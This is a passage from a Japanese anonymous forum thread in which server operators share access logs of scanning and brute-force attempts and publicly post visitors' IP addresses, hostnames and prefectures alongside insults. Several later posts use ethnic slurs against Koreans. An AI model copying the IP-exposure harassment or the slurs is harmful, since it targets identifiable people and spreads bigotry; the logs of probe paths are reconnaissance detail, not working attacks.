このスレで ID:SLuCn6vK0 大暴れしている
女子供を晒しアゲ中傷の嵐

151 ：DNS未登録さん：2012/09/22(土) 22:15:45.61 ID:???.net

>150
違法なら警察へGO!
警察庁：都道府県警察本部のサイバー犯罪相談窓口等一覧
http://www.npa.go.jp/cyber/soudan.htm

152 ：DNS未登録さん：2012/10/02(火) 22:00:03.21 ID:???.net

今日メールサーバーへの攻撃がすげぇんだけど・・・

153 ：DNS未登録さん：2012/10/05(金) 11:43:34.62 ID:???.net

>>152 こいつら？
12.7.145.50
12.71.117.172
12.238.210.67
24.39.213.154
24.97.64.230
24.103.52.22
24.123.56.246
24.186.3.95
24.234.155.80
50.75.160.114,
63.238.5.66
68.15.108.58
68.16.48.68
65.40.186.170
66.134.197.178
67.52.184.130
67.76.162.45

154 ：DNS未登録さん：2012/10/05(金) 11:45:21.53 ID:???.net

67.112.239.113
70.43.109.131
70.60.238.70
72.89.191.60
70.255.147.109
108.64.133.67
108.71.19.30
108.162.17.130
173.12.143.130
173.44.136.74
173.162.218.11
173.200.3.25
209.132.232.92
209.166.158.116
216.1.42.19

以上のIPからうちのメールサーバーに数回ずつ短時間に連続して来てた

155 ：DNS未登録さん：2012/12/15(土) 15:08:28.20 ID:???.net

【一部抜粋】
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<zaragoza>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<boullosa>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<capurro>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<phernandez>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<lucero>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<moreno>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<munoz>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx

ユーザ名変えて物凄い勢いで来てた

156 ：DNS未登録さん：2013/02/09(土) 09:18:43.19 ID:???.net

66.161.176.108 - - [06/Feb/2013:21:06:40 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:10 +0900] "GET /admin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:11 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:11 +0900] "GET /phpMyAdmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /db/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /PMA/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /pma/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /admin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /mysql/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /myadmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:14 +0900] "GET /phpadmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:14 +0900] "GET /webadmin/main.php HTTP/1.0" 404 1001 "-" "-"
72.51.39.133 - - [07/Feb/2013:20:41:09 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:09 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"

157 ：DNS未登録さん：2013/02/09(土) 09:21:02.01 ID:???.net

83.238.212.227 - - [06/Feb/2013:18:09:28 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:29 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:29 +0900] "GET /admin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:30 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:31 +0900] "GET /mysql/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
141.212.121.10 - - [05/Feb/2013:23:42:40 +0900] "\x80w\x01\x03\x01" 501 951 "-" "-"
MyAdminなんかねえよ馬鹿

158 ：DNS未登録さん：2013/02/10(日) 20:46:55.12 ID:???.net

pmaアタックしょっちゅう来るよね
うちはディレクトリ名に誕生日入れてるから大丈夫

159 ：DNS未登録さん：2013/02/14(木) 19:09:02.51 ID:???.net

126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:21 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-"

softbank126009120142.bbtec.netで検索すると大量に引っかかるから踏み台経由なんだろう

160 ：DNS未登録さん：2013/02/22(金) 17:41:03.39 ID:???.net

俺の名前は脱糞マン　今日も脱糞もりもりー！

161 ：DNS未登録さん：2013/05/31(金) 21:16:51.20 ID:EB7lGreO.net

192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD /phpmyadmintting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //phpMyAdmin/tting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //admin/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //mysql/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:45 +0900] "HEAD //phpmyadmin2/tting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:45 +0900] "HEAD /epgrec/envSetting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
46.249.33.47 - - [31/May/2013:18:21:29 +0900] "GET /epgrec/systemSetting.php HTTP/1.1" 404 1062 "-" "-"

162 ：DNS未登録さん：2013/08/05(月) NY:AN:NY.AN ID:94vJNvT+.net

IPアドレス 118.22.250.219
ホスト名 p3219-ipngn1202marunouchi.tokyo.ocn.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 東京都

F5連打やめろカス野郎!!

163 ：DNS未登録さん：2013/08/08(木) NY:AN:NY.AN ID:mX0qXlbe.net

110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144

164 ：DNS未登録さん：2013/08/16(金) NY:AN:NY.AN ID:9nzUfPAp.net

IPアドレス 219.33.248.7
ホスト名 softbank219033248007.bbtec.net
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 xDSL
都道府県 愛知県

165 ：DNS未登録さん：2013/08/16(金) NY:AN:NY.AN ID:9nzUfPAp.net

softbank219033248007.bbtec.net

/img/ic_p_hand.gif

13/08/167:47

error 403

softbank219033248007.bbtec.net

/img/ic_p_hand.gif

13/08/167:47

error 403

softbank219033248007.bbtec.net

/img/ic_p_hand.gif

13/08/167:47

error 403

softbank219033248007.bbtec.net

/img/ic_p_hand.gif

13/08/167:46

error 403

166 ：DNS未登録さん：2013/08/16(金) NY:AN:NY.AN ID:9nzUfPAp.net

IPアドレス 103.28.96.56
ホスト名 dhcp38056.orihime.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 該当なし
都道府県 該当なし

167 ：DNS未登録さん：2013/08/23(金) NY:AN:NY.AN ID:nLRBGm+O.net

IPアドレス 61.46.103.148
ホスト名 zaq3d2e6794.zaq.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 CATV
都道府県 大阪府

168 ：DNS未登録さん：2013/08/26(月) NY:AN:NY.AN ID:fpjUopE0.net

IPアドレス 123.225.228.170
ホスト名 p3170-ipbf1705sapodori.hokkaido.ocn.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 北海道

169 ：DNS未登録さん：2013/08/26(月) NY:AN:NY.AN ID:OJcg0k54.net

27.102.192.140からssh

/var/log/auth.log
Aug 26 06:24:32 ***** sshd[13852]: Invalid user bart from 27.102.192.140
Aug 26 06:24:32 ***** sshd[13852]: input_userauth_request: invalid user bart [preauth]
Aug 26 06:24:32 ***** sshd[13852]: pam_unix(sshd:auth): check pass; user unknown
Aug 26 06:24:32 ***** sshd[13852]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=27.102.192.140
Aug 26 06:24:32 ***** sshd[13852]: pam_winbind(sshd:auth): getting password (0x00000388)
Aug 26 06:24:32 ***** sshd[13852]: pam_winbind(sshd:auth): pam_get_item returned a password
Aug 26 06:24:34 ***** sshd[13852]: Failed password for invalid user bart from 27.102.192.140 port 33426 ssh2
Aug 26 06:24:34 ***** sshd[13852]: Received disconnect from 27.102.192.140: 11: Bye Bye [preauth]

170 ：DNS未登録さん：2013/08/29(木) NY:AN:NY.AN ID:tF8Whh+x.net

IPアドレス 111.108.19.55
ホスト名 kd111108019055.ppp-bb.dion.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 栃木県

171 ：DNS未登録さん：2013/08/30(金) NY:AN:NY.AN ID:6dzYV3Q5.net

IPアドレス 223.25.160.33
ホスト名 g1-223-25-160-33.bmobile.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 該当なし
都道府県 該当なし

172 ：DNS未登録さん：2013/08/31(土) NY:AN:NY.AN ID:tNHoGxV9.net

IPアドレス 106.177.13.31
ホスト名 kd106177013031.ppp-bb.dion.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 種別不明
都道府県 該当なし

173 ：DNS未登録さん：2013/09/02(月) 16:28:44.06 ID:TxMBkHkr.net

IPアドレス 118.21.111.71
ホスト名 i118-21-111-71.s30.a048.ap.plala.or.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 該当なし

174 ：DNS未登録さん：2013/09/03(火) 17:33:44.20 ID:???.net

KD106177151101.ppp-bb.dion.ne.jp

175 ：DNS未登録さん：2013/09/11(水) 22:33:45.90 ID:???.net

IPアドレス 125.1.164.67
ホスト名 nttkyo455067.tkyo.nt.ngn2.ppp.infoweb.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 東京都

176 ：DNS未登録さん：2013/09/18(水) 18:52:43.64 ID:LV75/hp7.net

IPアドレス 153.160.118.147
ホスト名 p7147-ipngn4701marunouchi.tokyo.ocn.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 東京都

F5連打キチガイ

177 ：DNS未登録さん：2013/09/26(木) 10:43:46.87 ID:H3fwxe36.net

IPアドレス 220.2.96.8
ホスト名 softbank220002096008.bbtec.net
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 xDSL
都道府県 静岡県

しつけーよカスヤルァー!!
二度と来るなよ!!

178 ：DNS未登録さん：2013/09/28(土) 12:03:51.71 ID:VCik+XYP.net

IPアドレス 106.159.106.72
ホスト名 KD106159106072.ppp-bb.dion.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 種別不明
都道府県 北海道

179 ：DNS未登録さん：2013/09/29(日) 19:52:16.89 ID:1SD9W5dU.net

IPアドレス 58.183.196.116
ホスト名 116.196.183.58.megaegg.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 広島県

F5連打うぜえ

180 ：DNS未登録さん：2013/10/03(木) 22:55:20.49 ID:VT6xWLU1.net

IPアドレス 61.193.122.189
ホスト名 flh1adk189.hkd.mesh.ad.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 北海道

181 ：DNS未登録さん：2013/10/26(土) 17:45:20.67 ID:7I33GS7j.net ?PLT(27717)

IPアドレス 121.84.32.120
ホスト名 121-84-32-120f1.hyg2.eonet.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 兵庫県

消え失せろクズ野郎!!
邪魔なんだよ!!

182 ：DNS未登録さん：2013/10/27(日) 22:37:50.15 ID:bwjv7tIF.net

IPアドレス 114.167.56.193
ホスト名 p1193-ipbf2406sapodori.hokkaido.ocn.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 北海道

消え失せろクズ野郎!!
邪魔なんだよ!!

183 ：DNS未登録さん：2013/11/08(金) 23:37:18.06 ID:+w98rXs3.net

IPアドレス 114.20.150.51
ホスト名 KD114020150051.ppp.prin.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 PHS
都道府県 該当なし

ブログ荒らしの糞チョン

184 ：DNS未登録さん：2013/11/08(金) 23:43:48.40 ID:+w98rXs3.net

ファビョった朝鮮人うぜー

185 ：DNS未登録さん：2013/11/09(土) 08:14:46.27 ID:eIre5eR+.net

リモートホスト i121-117-132-189.s41.a030.ap.plala.or.jp
IPアドレス 121.117.132.189

くだらんクエリ文字列付きでアクセスしてんじゃねーよクズ!!

186 ：DNS未登録さん：2013/11/10(日) 14:21:40.13 ID:???.net

IPアドレス 112.216.76.110

2013年11月08日(金)１時間弱の間にSMTP鯖に5972回不正アクセス

187 ：DNS未登録さん：2013/11/10(日) 17:35:26.12 ID:???.net

1分に100回？なんかミスったんじゃないのｗ

188 ：DNS未登録さん：2013/11/10(日) 19:06:57.94 ID:???.net

ミスって何？
ユーザー名とpass　ランダムに変えてたから総当たりスクリプトだろ

189 ：DNS未登録さん：2013/11/10(日) 19:39:49.84 ID:cVHzLtoH.net

IPアドレス 113.147.246.150
ホスト名 KD113147246150.ppp-bb.dion.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 北海道

くんじゃねーよクズ野郎!!

190 ：DNS未登録さん：2013/11/10(日) 20:43:43.12 ID:cVHzLtoH.net

今日も韓国人を叩く某ブログで

ウィルコムプロバイダのチョンが発狂しています

いい加減そろそろ通報しようと思う。

191 ：DNS未登録さん：2013/11/10(日) 20:54:43.23 ID:cVHzLtoH.net

2013-11-10 20:35:19
記事 Tomo's Blog
ブラウザ Mozilla/3.0(WILLCOM;KYOCERA/WX01K/2;2.0.3.14.000000/1/C256) NetFront/3.4
リモートホスト 114.20.150.165 (KD114020150165.ppp.prin.ne.jp)

IP晒します。

IPアドレス 114.20.150.165
ホスト名 KD114020150165.ppp.prin.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 PHS
都道府県 該当なし

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 114.20.128.0/17
b. [ネットワーク名] DP-PACKET2
f. [組織名] 株式会社ウィルコム
g. [Organization] WILLCOM, Inc.

192 ：DNS未登録さん：2013/11/11(月) 00:27:08.99 ID:lmKWIlMp.net

お前さ、詮索してきてんじゃねーよ!!

2013-11-10 22:45:35
記事 Tomo's Blog
ブラウザ Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
リモートホスト 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp)

2013-11-10 22:48:23
記事 Tomo's Blog
リファラ 俺の他のサイト
ブラウザ Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
リモートホスト 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp)

2013-11-10 22:48:39
記事 ブログ開設しました!
ブラウザ Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
リモートホスト 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp)

2013-11-10 22:49:26
記事 Tomo's Blog
リファラ http://blog.livedoor.jp/oboega/lite/archives/34528159/comments/7759059/?p=19
ブラウザ Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
リモートホスト 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp)

193 ：DNS未登録さん：2013/11/11(月) 00:28:43.93 ID:lmKWIlMp.net

誰が不人気だ、俺のブログはページランク4だぞ

なめんじゃねーぞコラ!!

194 ：DNS未登録さん：2013/11/11(月) 00:30:40.07 ID:lmKWIlMp.net

そろそろチョン野郎をアク禁にするか。

195 ：DNS未登録さん：2013/11/11(月) 12:47:25.88 ID:???.net

>>188
単にSMTPとしか書いて無かったらメール転送のリトライだと思うだろう

196 ：DNS未登録さん：2013/11/13(水) 18:35:10.97 ID:???.net

サブミッションじゃね？

知らないけど。

197 ：DNS未登録さん：2013/11/20(水) 15:11:20.22 ID:4DZV18u4.net

IPアドレス 162.210.196.165
ホスト名 対応するホスト名がありません。
IPアドレス割当国 アメリカ合衆国 ( us )
市外局番 該当なし
接続回線 該当なし
都道府県 該当なし

邪魔だよデコスケ

198 ：DNS未登録さん：2013/11/21(木) 15:00:19.78 ID:omIbxvki.net

IPアドレス 122.18.75.228
ホスト名 p1228-ipbf802sapodori.hokkaido.ocn.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 北海道


邪魔だよデコスケ

199 ：DNS未登録さん：2013/11/23(土) 03:25:43.53 ID:???.net

netstatでよく出てくるgooglebotさん?なのかな
TCP <hostname>:2035 nrt04s05-in-f3.1e100.net:http TIME_WAIT

薄気味悪ぃーくらいに出てくる
うちは単なるクライアント環境だし外部向けには何も公開していないんだが
javascript切ってGoogleにアクセスすると
必ずと言っていいほどにしばらくの間このドメインから訪問を受ける

200 ：DNS未登録さん：2013/11/29(金) 07:53:33.12 ID:???.net

FFの悪意のあるサイトのブロック切れ。

201 ：DNS未登録さん：2013/12/02(月) 01:09:52.19 ID:???.net

アタックまじうぜえ